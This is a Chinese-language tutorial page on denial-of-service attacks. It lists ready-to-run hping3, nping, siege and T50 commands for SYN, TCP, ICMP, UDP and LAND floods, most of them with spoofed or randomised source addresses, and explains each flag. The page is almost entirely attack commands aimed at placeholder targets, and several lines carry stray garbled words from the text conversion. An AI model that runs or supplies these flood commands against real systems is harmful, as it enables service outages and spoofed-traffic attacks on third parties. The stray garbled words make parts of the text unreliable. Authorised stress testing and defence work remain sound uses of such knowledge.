DoS拒絕服務-工具使用hping三、nping等(四)


Hping3
幾乎能夠定製發送任何tcp/ip數據包,用於測試fw,端口掃描,性能測試php

 1 Syn Flood
 2 – hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1 //一條命令搞定
 3 -c 計數器,屢次數據包 -d 數據包多大 -S syn包 -p 目標攻擊端口 --flood泛洪方式
 4 --rand-source:隨機源地址 1.1.1.1 攻擊的目標
 5 
 6 另一種組合:
 7 – hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1
 8 
 9 TCP Flood攻擊:
10 – hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 
11 -SARFUP標記類全標記滿
12 
13 ICMP Flood攻擊
14 – hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2
15 -q:安靜模式 -n:不做域名解析 -a:僞造源地址
16 
17 ▪ UDP Flood
18 – hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
19 -s:指定源端口,不指定也能夠
20 
21 LAND攻擊
22 – 僞造源地址和目標地址都是本身,形成本身打本身
23 – hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1

 


 

nping
TCP全連接DoS攻擊
– nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.33.135
--tcp-connect:創建tcp鏈接 --rate=10000:速率一萬個併發


 

Siege
– http/https 壓力測試
– siege -i -c 1000 http://1.1.1.1/a.php -A htttttp
-c 1000個併發鏈接
-A 自定義http頭,隨便寫均可以
– 同時攻擊多個url,-f 使用字典
▪ /etc/siege/urls.txttcp


 

▪ T50
– t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
– t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22性能

相關文章
相關標籤/搜索